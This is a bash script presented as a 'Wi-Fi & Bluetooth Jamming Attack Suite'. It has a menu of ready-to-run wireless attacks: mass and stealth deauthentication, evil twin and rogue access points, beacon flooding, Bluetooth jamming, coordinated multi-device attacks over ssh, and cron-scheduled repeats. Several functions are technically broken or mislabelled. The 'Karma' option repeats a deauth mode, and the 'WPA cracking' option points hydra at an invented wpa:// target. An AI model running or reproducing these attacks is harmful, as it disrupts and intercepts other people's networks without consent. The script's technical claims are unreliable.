#!
/bin/bash
# Ensure you run this as root (sudo)
# Professional Banner
clear
echo "-----------------------------------------------"
echo " Made by "
echo " dr.trojan "
echo "-----------------------------------------------"
echo " Wi-Fi & Bluetooth Jamming Attack Suite "
echo "-----------------------------------------------"
echo "[*] Please ensure you have the necessary tools installed."
echo "[*] Starting script..."
# Wireless Interface - Modify if needed
interface="wlan1"
bluetooth_interface="hci0"
# Function to check if interface is in monitor mode
check_monitor_mode() {
mode=$(iw dev "$interface" info | grep type | awk '{print $2}')
if [ "$mode" != "monitor" ]; then
echo "[*] Changing interface $interface to monitor mode..."
ip link set "$interface" down
iw dev "$interface" set type monitor
ip link set "$interface" up
fi
}
# Mass Deauth Attack - Target all nearby networks
mass_deauth_attack() {
echo "[*] Running Mass Deauthentication Attack on all nearby BSSIDs (channel
hopping)..."
sudo mdk4 "$interface" d
}
# Stealth Deauth Attack - Stealthily disconnect clients without beaconing
stealth_deauth_attack() {
echo "[*] Running Stealth Deauthentication Attack (Stealth Mode)..."
sudo mdk4 "$interface" a
}
# Crazy Mode Deauth Attack - Aggressive deauth with high frequency
crazy_deauth_attack() {
echo "[*] Running Crazy Deauthentication Attack (High Frequency)..."
sudo mdk4 "$interface" d -i 500
}
# Rogue AP (Evil Twin Attack) - Create a fake access point
evil_twin_attack() {
echo "[*] Running Evil Twin Attack (Rogue AP Creation)..."
ssid="FakeAP_$(date +%s)"
sudo airbase-ng -e "$ssid" -c 6 "$interface"
}
# Beacon Flood Attack - Flood AP channels with fake beacons
beacon_flood_attack() {
echo "[*] Running Beacon Flood Attack..."
sudo mdk4 "$interface" b
}
# Karma Attack - Fake APs based on devices' previous networks
karma_attack() {
echo "[*] Running Karma Attack..."
sudo mdk4 "$interface" a
}
# Bluetooth Jamming Attack - Disrupt Bluetooth communication
bluetooth_jamming() {
echo "[*] Starting Bluetooth Jamming Attack..."
sudo hciconfig "$bluetooth_interface" up
sudo hcitool cmd 0x03 0x0003
sudo hcitool cmd 0x04 0x0003
sudo hcitool cmd 0x03 0x0008
# Continuous jamming
while true; do
sudo hcitool cmd 0x03 0x0008
sleep 1
done
}
# Simultaneous Attacks - Run multiple attacks at the same time
simultaneous_attacks() {
echo "[*] Starting Simultaneous Attacks..."
mass_deauth_attack &
evil_twin_attack &
beacon_flood_attack &
karma_attack &
wait
}
# Attack Ramp-up - Gradually increase attack intensity
attack_ramp_up() {
echo "[*] Ramp-up Attack Mode: Increasing intensity..."
sudo mdk4 "$interface" d -i 500
}
# GPS Location Tracking (optional, requires GPS module)
gps_tracking() {
echo "[*] GPS tracking is enabled (requires GPS hardware)"
gpspipe -w | head -n 10
}
# Distributed Attacks - Use multiple devices for coordinated attacks
distributed_attack() {
echo "[*] Starting Distributed Attacks..."
ssh pi@192.168.0.2 'bash /path/to/attack_script.sh' & # Repeat for each device
wait
}
# Auto-Dosing Attack - Gradually increase packet rate for a more intense attack
auto_dosing_attack() {
echo "[*] Auto-Dosing Attack Mode: Gradually increasing packet rate..."
sudo aireplay-ng --deauth 0 -a FF:FF:FF:FF:FF:FF "$interface" -c 10
}
# Schedule Attacks Automatically - Randomize attack timings
schedule_attack() {
echo "[*] Scheduling automated attacks at random intervals..."
cronjob="* * * * * sudo /path/to/attack_script.sh"
echo "$cronjob" | crontab -
}
# Randomized Fake AP & BSSID Spoofing
randomized_ap_attack() {
echo "[*] Running Randomized Fake AP & BSSID Spoofing..."
sudo airbase-ng -e "FakeAP_$(date +%s)" -c $(($RANDOM % 11 + 1)) "$interface"
}
# WPA Cracking - Attempt to crack WPA handshakes (requires a capture file)
wpa_cracking_attack() {
echo "[*] Attempting WPA Cracking on targeted AP..."
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 -vV
wpa://<target_bssid>
}
# Rogue AP (Evil Twin)
create_rogue_ap() {
echo "[*] Creating Rogue AP (Evil Twin Attack)..."
sudo airbase-ng -e "RogueAP_$(date +%s)" -c 11 "$interface"
}
# Menu-based System for Attack Selection
while true; do
echo "-----------------------------------------------"
echo "1. Mass Deauthentication Attack (All Networks)"
echo "2. Stealth Deauthentication Attack"
echo "3. Crazy Mode Deauthentication Attack"
echo "4. Evil Twin (Rogue AP) Attack"
echo "5. Beacon Flood Attack"
echo "6. Karma Attack"
echo "7. Simultaneous Attacks"
echo "8. Attack Ramp-up"
echo "9. GPS Location Tracking"
echo "10. Distributed Attacks"
echo "11. Auto-Dosing Attack"
echo "12. Schedule Attacks Automatically"
echo "13. Randomized Fake AP & BSSID Spoofing"
echo "14. WPA Cracking Attack"
echo "15. Rogue AP (Evil Twin)"
echo "16. Bluetooth Jamming Attack"
echo "17. Exit"
read -p "Select attack option: " option
case $option in
1) check_monitor_mode; mass_deauth_attack ;;
2) check_monitor_mode; stealth_deauth_attack ;;
3) check_monitor_mode; crazy_deauth_attack ;;
4) check_monitor_mode; evil_twin_attack ;;
5) check_monitor_mode; beacon_flood_attack ;;
6) check_monitor_mode; karma_attack ;;
7) check_monitor_mode; simultaneous_attacks ;;
8) check_monitor_mode; attack_ramp_up ;;
9) gps_tracking ;;
10) distributed_attack ;;
11) check_monitor_mode; auto_dosing_attack ;;
12) schedule_attack ;;
13) check_monitor_mode; randomized_ap_attack ;;
14) wpa_cracking_attack ;;
15) create_rogue_ap ;;
16) bluetooth_jamming ;;
17) exit ;;
*) echo "Invalid option. Please try again." ;;
esac
done